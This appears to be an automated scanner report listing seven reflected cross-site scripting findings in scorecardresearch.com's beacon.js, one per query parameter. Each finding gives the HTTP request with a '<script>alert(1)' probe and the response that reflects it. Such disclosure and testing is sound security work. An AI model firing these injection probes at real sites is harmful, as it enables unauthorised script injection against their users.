1. Cross-site scripting (reflected)
1.1. http://b.scorecardresearch.com/beacon.js [c1 parameter]
1.2. http://b.scorecardresearch.com/beacon.js [c15 parameter]
1.3. http://b.scorecardresearch.com/beacon.js [c2 parameter]
1.4. http://b.scorecardresearch.com/beacon.js [c3 parameter]
1.5. http://b.scorecardresearch.com/beacon.js [c4 parameter]
1.6. http://b.scorecardresearch.com/beacon.js [c5 parameter]
1.7. http://b.scorecardresearch.com/beacon.js [c6 parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=27fc94<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:24 GMT Date: Sat, 12 Mar 2011 13:50:24 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... MSCORE.purge=function(a) COMSCORE.beacon({c1:"27fc94<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:32 GMT Date: Sat, 12 Mar 2011 13:50:32 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/", c5:"20000", c6:"", c10:"", c15:"fc018<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:26 GMT Date: Sat, 12 Mar 2011 13:50:26 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... unction(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"2", c2:"6036034ffca7<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:27 GMT Date: Sat, 12 Mar 2011 13:50:27 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... (a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"2", c2:"6036034", c3:"cb8c0<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:28 GMT Date: Sat, 12 Mar 2011 13:50:28 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/b6f15<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:29 GMT Date: Sat, 12 Mar 2011 13:50:29 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... ;a=a||_comscore;for(b=a COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/", c5:"200009b5b7<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nickjr.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 19 Mar 2011 13:50:31 GMT Date: Sat, 12 Mar 2011 13:50:31 GMT Connection: close Content-Length: 3586 if(typeof COMSCORE=="undefined") ...[SNIP]... comscore;for(b=a.length-1 COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/", c5:"20000", c6:"a2734<script>alert(1)< |